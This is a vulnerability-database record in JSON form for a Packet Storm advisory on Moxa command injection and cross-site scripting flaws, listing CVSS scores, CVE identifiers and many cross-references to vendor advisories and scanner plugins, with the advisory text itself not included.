DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:164014", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Moxa Command Injection / Cross Site Scripting / Vulnerable Software", "description": "", "published": "2021-09-01T00:00:00", "modified": "2021-09-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://packetstormsecurity.com/files/164014/Moxa-Command-Injection-Cross-Site-Scripting-Vulnerable-Software.html", "reporter": "T. Weber", "references": [], "cvelist": ["CVE-2013-1914", "CVE-2013-7423", "CVE-2015-0235", "CVE-2015-7547", "CVE-2016-1234", "CVE-2021-39278", "CVE-2021-39279"], "immutableFields": [], "lastseen": "2021-09-01T16:00:43", "viewCount": 83, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2013-270", "ALAS-2015-473", "ALAS-2015-493", "ALAS-2015-494", "ALAS-2015-513", "ALAS-2015-617", "ALAS-2016-653"]}, {"type": "archlinux", "idList": ["ASA-201501-22", "ASA-201501-23", "ASA-201602-14", "ASA-201602-15", "ASA-201605-19", "ASA-201605-20"]}, {"type": "attackerkb", "idList": ["AKB:70FA909E-B9D0-4B61-B54F-9639E5A20E3E"]}, {"type": "centos", "idList": ["CESA-2013:0769", "CESA-2013:1605", "CESA-2015:0090", "CESA-2015:0092", "CESA-2015:0863", "CESA-2015:2199", "CESA-2016:0175", "CESA-2016:0176"]}, {"type": "cert", "idList": ["VU:457759", "VU:967332"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-0075", "CPAI-2016-0120", "CPAI-2021-0707"]}, {"type": "checkpoint_security", "idList": ["CPS:SK104443"]}, {"type": "chrome", "idList": ["GCSA-1897158468453512833"]}, {"type": "cisa", "idList": ["CISA:E8C8F007DF2A448F84459142FD8D46F7"]}, {"type": "cisco", "idList": ["CISCO-SA-20150128-GHOST", "CISCO-SA-20160218-GLIBC"]}, {"type": "citrix", "idList": ["CTX200391", "CTX206991"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:63DB340A742A21A8EFB20A9452A0EDD2", "CFOUNDRY:A516F32ABFB2AE83A8782E47D67A09A0"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}, {"type": "cve", "idList": ["CVE-2013-1914", "CVE-2013-4458", "CVE-2013-7423", "CVE-2015-0235", "CVE-2015-7547", "CVE-2016-1234", "CVE-2021-39278", "CVE-2021-39279"]}, {"type": "debian", "idList": ["DEBIAN:DLA-139-1:543FA", "DEBIAN:DLA-139-1:5734D", "DEBIAN:DLA-165-1:23BFE", "DEBIAN:DLA-416-1:26BFF", "DEBIAN:DLA-494-1:C3160", "DEBIAN:DSA-3142-1:A3964", "DEBIAN:DSA-3480-1:7D107", "DEBIAN:DSA-3480-1:E6251", "DEBIAN:DSA-3481-1:79F3C", "DEBIAN:DSA-3481-1:FD30A"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-1914", "DEBIANCVE:CVE-2013-4458", "DEBIANCVE:CVE-2013-7423", "DEBIANCVE:CVE-2015-0235", "DEBIANCVE:CVE-2015-7547", "DEBIANCVE:CVE-2016-1234"]}, {"type": "exploitdb", "idList": ["EDB-ID:35951", "EDB-ID:36421", "EDB-ID:39454", "EDB-ID:40339"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3677CEA2F5D55BD8516ACA2EC17EB7DE", "EXPLOITPACK:99988BAE0A27143CB886C29FF1A9E24F", "EXPLOITPACK:DD5C62A73445C642253B1991DCB09412", "EXPLOITPACK:F166ACAD2E7FB4051F3FE1B40BED2A86"]}, {"type": "f5", "idList": ["F5:K05125306", "F5:K15640", "F5:K16057", "F5:K16841", "F5:K47098834", "SOL05125306", "SOL15640", "SOL16057", "SOL16841", "SOL47098834"]}, {"type": "fedora", "idList": ["FEDORA:235CB60918EC", "FEDORA:64A9D6098B14", "FEDORA:8E57121104", "FEDORA:B936B608A494", "FEDORA:D5374605E7C9", "FEDORA:DDA9F617A812", "FEDORA:E4AC9605712D"]}, {"type": "fortinet", "idList": ["FG-IR-15-001", "FG-IR-16-002"]}, {"type": "freebsd", "idList": ["0765DE84-A6C1-11E4-A0C1-C485083CA99C", "2DD7E97E-D5E8-11E5-BCBD-BC5FF45D0F28", "F7A9E415-BDCA-11E4-970C-000C292EE6B8"]}, {"type": "gentoo", "idList": ["GLSA-201503-04", "GLSA-201602-02", "GLSA-201702-11"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20150226-01-GLIBC", "HUAWEI-SA-20160304-01-GLIBC", "HUAWEI-SA-20160304-01-GLIBC-EN"]}, {"type": "ibm", "idList": ["07C98FF3003D3C882D6D221E7B29364598F31BB7789A307B39FFD065F50D7DAD", "1552258BC602B501CB144C17FE55DEC12CEDE82B9F4351E9E4F47BE8C7003BA9", "186826DEC64CEF861CABB6400E9E91E4A3DA403061721894238F233211663F6F", "19014976708B59CA6D0D38BD53FC83A65A328CD06A0D3047C00AD7FB2745CD32", "2F49E9558A54792FB4B7C82B3D194CF2DBE7360CDBED08DDB0A72C0BB8B5E55D", "30DA82A4D9D953FA05B77587C05ACDA5267AB07461D4D91A5A2F630AB91A48E7", "35BCD86D8DB1903754E8FC7D36AFC356E7567826BEAF12494F91D28A6919000C", "37A8EA79DB0196D216B0D013B92E7DAD84ADF24BB48ABABFFEE092ACB6E91917", "3D3EE58E80C8983DECD0C51663BD74CB8497D9389FE462B6FD769F37D1357F58", "40757940D0054030B6297C248ABB540ADB302DD9F89B94DDB202585009632F53", "494FCFB7068CB9C9CEB3FE685DE60B86133F530BABAFDA1274F0A594D23B03AC", "4EF9332DC41BD9A19557ED28E080D548C37B2564308E9B4AFC6661AE1FF86428", "57D4D5784CAAE70A1B1FA0264C55B10A1EDA6227EBFF271C69ACFB06AC8496F5", "72AAB744629B3C1BAA0D455C97AF7BF221EB3309C727A1B6D998F265F5149374", "7B8432DD8520D3949A96EEA5A92470BE8D0BA4F2BB13B9B9BD82903947E9225F", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "8C189A4A1E730005F1F6728800F9EEB4D76D43743AEC3B91CE47044F6F13EBE4", "8CB034EC6C7868DFE21F2D403926D13C437E7B3AFD801B320D74F5F4D6766556", "907E0D74CE0C900AF8689D59A3185DB81C196044920978A4EE732195B24DEDA9", "97D5F772EC68BDCD260FBB9DFB7A322AAAC657E9360305DF11F9C6A6A40D1B85", "AE21B16579A39A7500DE184D914C70B4ACB78A6622A77B295BE56BEEC705B523", "C86B188A7127CAE85E5FDBF3B4916053805066D60BD01903963131F95128AC82", "D07C2D91DFB25D9BB82D314BD7D4D3FA3EC79AB19FD146811E306483378A7AF4", "D2DEA5F45A3AB17EC5600C76D66BFE53D1F0214B38862EDBEA32FD76E6762B3A", "D44A21C5045B081F961B0359D983B64AE4513E83763BDBA91D48D4282CFAEFFE", "DF2BD5A9760617F387DDBFB4D43BD83DA3301F8FFA9F60E10B1612C71BB3BA3D", "E8CC192D6E15BEBE986983A316004294627ED7683B92C8AA39E3B1075CDDF8ED"]}, {"type": "ics", "idList": ["ICSA-15-064-01A", "ICSA-16-103-01"]}, {"type": "kitploit", "idList": ["KITPLOIT:4462385753504235463"]}, {"type": "lenovo", "idList": ["LENOVO:PS500043-NOSID"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF", "MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF/", "MSF:ILITIES/AMAZON-LINUX-AMI-ALAS-2015-473/", "MSF:ILITIES/AMAZON-LINUX-AMI-ALAS-2015-493/", "MSF:ILITIES/AMAZON-LINUX-AMI-ALAS-2015-494/", "MSF:ILITIES/GENTOO-LINUX-CVE-2015-0235/", "MSF:ILITIES/LINUXRPM-ELSA-2015-0090/", "MSF:ILITIES/LINUXRPM-ELSA-2015-0101/", "MSF:ILITIES/LINUXRPM-RHSA-2015-0099/", "MSF:ILITIES/LINUXRPM-RHSA-2015-0101/", "MSF:ILITIES/LINUXRPM-RHSA-2015-0126/", "MSF:ILITIES/SUSE-CVE-2015-0235/"]}, {"type": "myhack58", "idList": ["MYHACK58:62201671834", "MYHACK58:62201783590", "MYHACK58:62201783974"]}, {"type": "nessus", "idList": ["8677.PRM", "8801.PRM", "8982.PRM", "9324.PRM", "ALA_ALAS-2013-270.NASL", "ALA_ALAS-2015-473.NASL", "ALA_ALAS-2015-493.NASL", "ALA_ALAS-2015-494.NASL", "ALA_ALAS-2015-513.NASL", "ALA_ALAS-2015-617.NASL", "ALA_ALAS-2016-653.NASL", "ARISTA_EOS_SA0017.NASL", "CENTOS_RHSA-2013-0769.NASL", "CENTOS_RHSA-2013-1605.NASL", "CENTOS_RHSA-2015-0090.NASL", "CENTOS_RHSA-2015-0092.NASL", "CENTOS_RHSA-2015-0863.NASL", "CENTOS_RHSA-2015-2199.NASL", "CENTOS_RHSA-2016-0175.NASL", "CENTOS_RHSA-2016-0176.NASL", "CHECK_POINT_GAIA_SK104443.NASL", "CISCO-CSCUY36553-NXOS.NASL", "CISCO-SA-20150128-ACE.NASL", "CISCO-SA-20150128-GHOST-IOSXE_MULTI.NASL", "CISCO-SA-20150128-GHOST-IOSXE_NOVA.NASL", "CISCO-SA-20150128-GHOST-IOSXR_NCS6K.NASL", "CISCO-SA-20150128-GHOST-NXOS.NASL", "CISCO_CUCM_CSCUS66650-GHOST.NASL", "CISCO_CUPS_CSCUS69785.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUS69523.NASL", "CISCO_TELEPRESENCE_VCS_CSCUS69558.NASL", "DEBIAN_DLA-139.NASL", "DEBIAN_DLA-165.NASL", "DEBIAN_DLA-416.NASL", "DEBIAN_DLA-494.NASL", "DEBIAN_DSA-3142.NASL", "DEBIAN_DSA-3480.NASL", "DEBIAN_DSA-3481.NASL", "EULEROS_SA-2019-1386.NASL", "EULEROS_SA-2019-1551.NASL", "EULEROS_SA-2019-1552.NASL", "EULEROS_SA-2019-1844.NASL", "EULEROS_SA-2019-2155.NASL", "EULEROS_SA-2020-1478.NASL", "EULEROS_SA-2021-1069.NASL", "F5_BIGIP_SOL16057.NASL", "F5_BIGIP_SOL47098834.NASL", "FEDORA_2013-15053.NASL", "FEDORA_2016-0480DEFC94.NASL", "FEDORA_2016-0F9E9A34CE.NASL", "FEDORA_2016-68ABC0BE35.NASL", "FEDORA_2016-B321728D74.NASL", "FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL", "FREEBSD_PKG_2DD7E97ED5E811E5BCBDBC5FF45D0F28.NASL", "FREEBSD_PKG_F7A9E415BDCA11E4970C000C292EE6B8.NASL", "GENTOO_GLSA-201503-04.NASL", "GENTOO_GLSA-201602-02.NASL", "GENTOO_GLSA-201702-11.NASL", "MACOSX_10_10_4.NASL", "MACOSX_10_11.NASL", "MACOSX_10_11_1.NASL", "MACOSX_SECUPD2015-005.NASL", "MACOSX_SECUPD2015-007.NASL", "MANDRIVA_MDVSA-2013-163.NASL", "MANDRIVA_MDVSA-2015-039.NASL", "MANDRIVA_MDVSA-2015-218.NASL", "NEWSTART_CGSL_NS-SA-2019-0012_GLIBC.NASL", "OPENSUSE-2013-723.NASL", "OPENSUSE-2015-173.NASL", "OPENSUSE-2015-84.NASL", "OPENSUSE-2016-224.NASL", "OPENSUSE-2016-233.NASL", "OPENSUSE-2016-234.NASL", "OPENSUSE-2016-699.NASL", "OPENSUSE-2016-852.NASL", "ORACLELINUX_ELSA-2013-0769.NASL", "ORACLELINUX_ELSA-2013-1605.NASL", "ORACLELINUX_ELSA-2015-0090.NASL", "ORACLELINUX_ELSA-2015-0092.NASL", "ORACLELINUX_ELSA-2015-0101.NASL", "ORACLELINUX_ELSA-2015-0863.NASL", "ORACLELINUX_ELSA-2015-2199.NASL", "ORACLELINUX_ELSA-2016-0175.NASL", "ORACLELINUX_ELSA-2016-0176.NASL", "ORACLEVM_OVMSA-2014-0017.NASL", "ORACLEVM_OVMSA-2015-0022.NASL", "ORACLEVM_OVMSA-2015-0023.NASL", "ORACLEVM_OVMSA-2015-0024.NASL", "ORACLEVM_OVMSA-2015-0055.NASL", "ORACLEVM_OVMSA-2016-0013.NASL", "ORACLEVM_OVMSA-2017-0051.NASL", "PALO_ALTO_PAN-SA-2015-0002.NASL", "PHOTONOS_PHSA-2017-0013.NASL", "PHOTONOS_PHSA-2017-0013_GLIBC.NASL", "PHP_5_4_38.NASL", "PHP_5_5_22.NASL", "PHP_5_6_6.NASL", "REDHAT-RHSA-2013-0769.NASL", "REDHAT-RHSA-2013-1605.NASL", "REDHAT-RHSA-2015-0090.NASL", "REDHAT-RHSA-2015-0092.NASL", "REDHAT-RHSA-2015-0099.NASL", "REDHAT-RHSA-2015-0101.NASL", "REDHAT-RHSA-2015-0126.NASL", "REDHAT-RHSA-2015-0863.NASL", "REDHAT-RHSA-2015-2199.NASL", "REDHAT-RHSA-2015-2589.NASL", "REDHAT-RHSA-2016-0175.NASL", "REDHAT-RHSA-2016-0176.NASL", "REDHAT-RHSA-2016-0225.NASL", "REDHAT-RHSA-2016-0277.NASL", "REDHAT-RHSA-2016-1207.NASL", "SLACKWARE_SSA_2015-028-01.NASL", "SLACKWARE_SSA_2016-054-02.NASL", "SL_20130424_GLIBC_ON_SL5_X.NASL", "SL_20131121_GLIBC_ON_SL6_X.NASL", "SL_20150127_GLIBC_ON_SL5_X.NASL", "SL_20150127_GLIBC_ON_SL6_X.NASL", "SL_20150421_GLIBC_ON_SL6_X.NASL", "SL_20151119_GLIBC_ON_SL7_X.NASL", "SL_20160216_GLIBC_ON_SL6_X.NASL", "SL_20160216_GLIBC_ON_SL7_X.NASL", "SUSE_11_GLIBC-130913.NASL", "SUSE_11_GLIBC-130917.NASL", "SUSE_11_GLIBC-150122.NASL", "SUSE_11_GLIBC-150226.NASL", "SUSE_GLIBC-8579.NASL", "SUSE_GLIBC-9035.NASL", "SUSE_SU-2013-0858-1.NASL", "SUSE_SU-2013-1251-1.NASL", "SUSE_SU-2013-1287-1.NASL", "SUSE_SU-2015-0526-1.NASL", "SUSE_SU-2015-0550-1.NASL", "SUSE_SU-2015-0551-1.NASL", "SUSE_SU-2016-0470-1.NASL", "SUSE_SU-2016-0471-1.NASL", "SUSE_SU-2016-0472-1.NASL", "SUSE_SU-2016-1721-1.NASL", "SUSE_SU-2016-1733-1.NASL", "SUSE_SU-2016-2156-1.NASL", "UBUNTU_USN-1991-1.NASL", "UBUNTU_USN-2485-1.NASL", "UBUNTU_USN-2519-1.NASL", "UBUNTU_USN-2900-1.NASL", "UBUNTU_USN-3239-1.NASL", "UBUNTU_USN-3239-2.NASL", "UBUNTU_USN-3239-3.NASL", "VMWARE_ESXI_5_1_BUILD_2323231_REMOTE.NASL", "VMWARE_ESXI_5_1_BUILD_2323236_REMOTE.NASL", "VMWARE_ESXI_5_5_BUILD_2068190_REMOTE.NASL", "VMWARE_VMSA-2014-0008.NASL", "VMWARE_VMSA-2014-0008_REMOTE.NASL", "VMWARE_VMSA-2016-0002.NASL", "VMWARE_VMSA-2016-0002_REMOTE.NASL", "WEB_APPLICATION_SCANNING_98829", "XEROX_XRX15AD_COLORQUBE.NASL", "XEROX_XRX15R.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105086", "OPENVAS:1361412562310105087", "OPENVAS:1361412562310105088", "OPENVAS:1361412562310105188", "OPENVAS:1361412562310105192", "OPENVAS:1361412562310105264", "OPENVAS:1361412562310105554", "OPENVAS:1361412562310105560", "OPENVAS:1361412562310105561", "OPENVAS:1361412562310106427", "OPENVAS:1361412562310120167", "OPENVAS:1361412562310120170", "OPENVAS:1361412562310120286", "OPENVAS:1361412562310120295", "OPENVAS:1361412562310120538", "OPENVAS:1361412562310120607", "OPENVAS:1361412562310120643", "OPENVAS:1361412562310121358", "OPENVAS:1361412562310121441", "OPENVAS:1361412562310122787", "OPENVAS:1361412562310122877", "OPENVAS:1361412562310122878", "OPENVAS:1361412562310122879", "OPENVAS:1361412562310122881", "OPENVAS:1361412562310123128", "OPENVAS:1361412562310123196", "OPENVAS:1361412562310123197", "OPENVAS:1361412562310123527", "OPENVAS:1361412562310123634", "OPENVAS:1361412562310131241", "OPENVAS:1361412562310703142", "OPENVAS:1361412562310703480", "OPENVAS:1361412562310703481", "OPENVAS:1361412562310805676", "OPENVAS:1361412562310807296", "OPENVAS:1361412562310807299", "OPENVAS:1361412562310808027", "OPENVAS:1361412562310808401", "OPENVAS:1361412562310813191", "OPENVAS:1361412562310841605", "OPENVAS:1361412562310842077", "OPENVAS:1361412562310842104", "OPENVAS:1361412562310842643", "OPENVAS:1361412562310843099", "OPENVAS:1361412562310843104", "OPENVAS:1361412562310843108", "OPENVAS:1361412562310850633", "OPENVAS:1361412562310850839", "OPENVAS:1361412562310851204", "OPENVAS:1361412562310851206", "OPENVAS:1361412562310851207", "OPENVAS:1361412562310851208", "OPENVAS:1361412562310866841", "OPENVAS:1361412562310866854", "OPENVAS:1361412562310866945", "OPENVAS:1361412562310868418", "OPENVAS:1361412562310869039", "OPENVAS:1361412562310869053", "OPENVAS:1361412562310870985", "OPENVAS:1361412562310871075", "OPENVAS:1361412562310871307", "OPENVAS:1361412562310871308", "OPENVAS:1361412562310871360", "OPENVAS:1361412562310871503", "OPENVAS:1361412562310871555", "OPENVAS:1361412562310871557", "OPENVAS:1361412562310881722", "OPENVAS:1361412562310882107", "OPENVAS:1361412562310882108", "OPENVAS:1361412562310882109", "OPENVAS:1361412562310882172", "OPENVAS:1361412562310882391", "OPENVAS:1361412562310882399", "OPENVAS:1361412562311220191386", "OPENVAS:1361412562311220191551", "OPENVAS:1361412562311220191552", "OPENVAS:1361412562311220191844", "OPENVAS:1361412562311220192155", "OPENVAS:1361412562311220201478", "OPENVAS:703142", "OPENVAS:703480", "OPENVAS:703481", "OPENVAS:841605", "OPENVAS:866841", "OPENVAS:866854", "OPENVAS:866945", "OPENVAS:870985", "OPENVAS:871075", "OPENVAS:881722"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2015", "ORACLE:CPUAPR2015-2365600", "ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2016V3-2985753", "ORACLE:CPUJAN2016", "ORACLE:CPUJAN2016-2367955", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2018-3236628", "ORACLE:CPUJUL2015", "ORACLE:CPUJUL2015-2367936", "ORACLE:CPUJUL2016", "ORACLE:CPUJUL2016-2881720", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2017-3236622", "ORACLE:CPUOCT2015", "ORACLE:CPUOCT2015-2367953", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2016-2881722", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626", "ORACLE:CPUOCT2018", "ORACLE:CPUOCT2018-4428296"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0769", "ELSA-2013-1605", "ELSA-2015-0090", "ELSA-2015-0092", "ELSA-2015-0101", "ELSA-2015-0327", "ELSA-2015-0863", "ELSA-2015-1627", "ELSA-2015-2199", "ELSA-2016-0175", "ELSA-2016-0176", "ELSA-2016-2573", "ELSA-2016-3515", "ELSA-2016-3516", "ELSA-2016-3638"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130115", "PACKETSTORM:130171", "PACKETSTORM:130974", "PACKETSTORM:138601", "PACKETSTORM:153278", "PACKETSTORM:154361"]}, {"type": "paloalto", "idList": ["PAN-SA-2015-0002", "PAN-SA-2016-0021"]}, {"type": "photon", "idList": ["PHSA-2017-0013", "PHSA-2017-0037"]}, {"type": "redhat", "idList": ["RHSA-2013:0769", "RHSA-2013:1527", "RHSA-2013:1605", "RHSA-2015:0090", "RHSA-2015:0092", "RHSA-2015:0099", "RHSA-2015:0101", "RHSA-2015:0126", "RHSA-2015:0863", "RHSA-2015:2199", "RHSA-2015:2589", "RHSA-2016:0175", "RHSA-2016:0176", "RHSA-2016:0225", "RHSA-2016:0277", "RHSA-2016:1207"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29383", "SECURITYVULNS:DOC:30044", "SECURITYVULNS:DOC:31672", "SECURITYVULNS:DOC:31790", "SECURITYVULNS:DOC:31977", "SECURITYVULNS:DOC:32267", "SECURITYVULNS:DOC:32522", "SECURITYVULNS:DOC:32566", "SECURITYVULNS:VULN:13071", "SECURITYVULNS:VULN:14240", "SECURITYVULNS:VULN:14314", "SECURITYVULNS:VULN:14393", "SECURITYVULNS:VULN:14431", "SECURITYVULNS:VULN:14562", "SECURITYVULNS:VULN:14601", "SECURITYVULNS:VULN:14702", "SECURITYVULNS:VULN:14755"]}, {"type": "seebug", "idList": ["SSV:89237", "SSV:90749"]}, {"type": "slackware", "idList": ["SSA-2015-028-01", "SSA-2016-054-02"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0162-1", "OPENSUSE-SU-2015:0184-1", "OPENSUSE-SU-2016:0490-1", "OPENSUSE-SU-2016:0510-1", "OPENSUSE-SU-2016:0511-1", "OPENSUSE-SU-2016:0512-1", "SUSE-SU-2015:0158-1", "SUSE-SU-2016:0470-1", "SUSE-SU-2016:0471-1", "SUSE-SU-2016:0472-1", "SUSE-SU-2016:0473-1", "SUSE-SU-2016:0748-1", "SUSE-SU-2016:0778-1", "SUSE-SU-2016:0786-1", "SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"]}, {"type": "symantec", "idList": ["SMNTC-1348"]}, {"type": "thn", "idList": ["THN:3DD8F9ADFFEB290F33825414D41B0F41", "THN:A649F4ABCE9B99052139693A13D95B14", "THN:ACBFC80659E47A5B7C81B99570749679"]}, {"type": "threatpost", "idList": ["THREATPOST:3A858BD40E6943BD3F4553301036091D", "THREATPOST:85ADF3548849401007E4326098F0A726", "THREATPOST:8B5C2D5280CC957CA9A4CB0C697F96D8", "THREATPOST:C83FE8B4B85CD379E535AF0E229EB5D2"]}, {"type": "ubuntu", "idList": ["USN-1991-1", "USN-2485-1", "USN-2519-1", "USN-2900-1", "USN-3239-1", "USN-3239-2", "USN-3239-3"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-1914", "UB:CVE-2013-7423", "UB:CVE-2015-0235", "UB:CVE-2015-7547", "UB:CVE-2016-1234"]}, {"type": "vmware", "idList": ["VMSA-2014-0008", "VMSA-2014-0008.2", "VMSA-2016-0002", "VMSA-2016-0002.1"]}, {"type": "vulnerlab", "idList": ["VULNERABLE:1430", "VULNERLAB:1430"]}, {"type": "zdt", "idList": ["1337DAY-ID-23215", "1337DAY-ID-23392", "1337DAY-ID-24769", "1337DAY-ID-25827", "1337DAY-ID-36699"]}]}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2013-270", "ALAS-2015-473"]}, {"type": "archlinux", "idList": ["ASA-201501-22"]}, {"type": "centos", "idList": ["CESA-2013:0769", "CESA-2015:0090", "CESA-2015:0092", "CESA-2015:0863", "CESA-2016:0175", "CESA-2016:0176"]}, {"type": "cert", "idList": ["VU:457759", "VU:967332"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0707"]}, {"type": "checkpoint_security", "idList": ["CPS:SK104443"]}, {"type": "cisa", "idList": ["CISA:E8C8F007DF2A448F84459142FD8D46F7"]}, {"type": "cisco", "idList": ["CISCO-SA-20160218-GLIBC"]}, {"type": "cve", "idList": ["CVE-2013-1914", "CVE-2015-7547", "CVE-2021-39278", "CVE-2021-39279"]}, {"type": "debian", "idList": ["DEBIAN:DLA-494-1:C3160"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-1914", "DEBIANCVE:CVE-2013-7423", "DEBIANCVE:CVE-2015-0235", "DEBIANCVE:CVE-2015-7547", "DEBIANCVE:CVE-2016-1234"]}, {"type": "exploitdb", "idList": ["EDB-ID:39454"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:99988BAE0A27143CB886C29FF1A9E24F"]}, {"type": "f5", "idList": ["SOL16841", "SOL47098834"]}, {"type": "fedora", "idList": ["FEDORA:E4AC9605712D"]}, {"type": "fortinet", "idList": ["FG-IR-16-002"]}, {"type": "freebsd", "idList": ["2DD7E97E-D5E8-11E5-BCBD-BC5FF45D0F28", "F7A9E415-BDCA-11E4-970C-000C292EE6B8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20150226-01-GLIBC"]}, {"type": "ibm", "idList": ["186826DEC64CEF861CABB6400E9E91E4A3DA403061721894238F233211663F6F", "3D3EE58E80C8983DECD0C51663BD74CB8497D9389FE462B6FD769F37D1357F58", "7B8432DD8520D3949A96EEA5A92470BE8D0BA4F2BB13B9B9BD82903947E9225F", "DF2BD5A9760617F387DDBFB4D43BD83DA3301F8FFA9F60E10B1612C71BB3BA3D"]}, {"type": "kitploit", "idList": ["KITPLOIT:4462385753504235463"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "MSF:ILITIES/LINUXRPM-RHSA-2015-0126/"]}, {"type": "myhack58", "idList": ["MYHACK58:62201671834"]}, {"type": "nessus", "idList": ["ALA_ALAS-2015-513.NASL", "ALA_ALAS-2016-653.NASL", "CENTOS_RHSA-2015-0090.NASL", "CENTOS_RHSA-2016-0175.NASL", "CENTOS_RHSA-2016-0176.NASL", "CISCO-CSCUY36553-NXOS.NASL", "DEBIAN_DLA-416.NASL", "DEBIAN_DSA-3481.NASL", "F5_BIGIP_SOL47098834.NASL", "FEDORA_2016-0F9E9A34CE.NASL", "FREEBSD_PKG_2DD7E97ED5E811E5BCBDBC5FF45D0F28.NASL", "MACOSX_10_11.NASL", "OPENSUSE-2015-84.NASL", "OPENSUSE-2016-233.NASL", "OPENSUSE-2016-234.NASL", "ORACLELINUX_ELSA-2013-0769.NASL", "ORACLELINUX_ELSA-2015-0101.NASL", "ORACLELINUX_ELSA-2016-0175.NASL", "ORACLELINUX_ELSA-2016-0176.NASL", "PALO_ALTO_PAN-SA-2015-0002.NASL", "PHP_5_4_38.NASL", "PHP_5_5_22.NASL", "PHP_5_6_6.NASL", "REDHAT-RHSA-2016-0175.NASL", "REDHAT-RHSA-2016-0176.NASL", "REDHAT-RHSA-2016-0225.NASL", "REDHAT-RHSA-2016-0277.NASL", "SLACKWARE_SSA_2016-054-02.NASL", "SL_20131121_GLIBC_ON_SL6_X.NASL", "SL_20151119_GLIBC_ON_SL7_X.NASL", "SL_20160216_GLIBC_ON_SL6_X.NASL", "SL_20160216_GLIBC_ON_SL7_X.NASL", "SUSE_SU-2016-0470-1.NASL", "UBUNTU_USN-2900-1.NASL", "UBUNTU_USN-3239-2.NASL", "VMWARE_VMSA-2016-0002.NASL", "VMWARE_VMSA-2016-0002_REMOTE.NASL", "XEROX_XRX15AD_COLORQUBE.NASL", "XEROX_XRX15R.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105087", "OPENVAS:1361412562310120607", "OPENVAS:1361412562310842077", "OPENVAS:1361412562310843108", "OPENVAS:1361412562310850839", "OPENVAS:1361412562310871075", "OPENVAS:1361412562311220201478", "OPENVAS:866945"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2015", "ORACLE:CPUJUL2015-2367936", "ORACLE:CPUJUL2016-2881720", "ORACLE:CPUJUL2017"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0769", "ELSA-2013-1605", "ELSA-2015-0092", "ELSA-2016-0175", "ELSA-2016-0176", "ELSA-2016-3515", "ELSA-2016-3516"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153278"]}, {"type": "photon", "idList": ["PHSA-2017-0013"]}, {"type": "redhat", "idList": ["RHSA-2013:1605"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31790", "SECURITYVULNS:VULN:13071"]}, {"type": "slackware", "idList": ["SSA-2015-028-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0162-1", "OPENSUSE-SU-2016:0490-1"]}, {"type": "thn", "idList": ["THN:A649F4ABCE9B99052139693A13D95B14", "THN:ACBFC80659E47A5B7C81B99570749679"]}, {"type": "threatpost", "idList": ["THREATPOST:3A858BD40E6943BD3F4553301036091D"]}, {"type": "ubuntu", "idList": ["USN-2519-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-7423"]}, {"type": "vmware", "idList": ["VMSA-2014-0008"]}, {"type": "vulnerlab", "idList": ["VULNERABLE:1430"]}, {"type": "zdt", "idList": ["1337DAY-ID-36699"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://packetstormsecurity.com/files/download/164014/SA-20210901-0.txt", "sourceData": 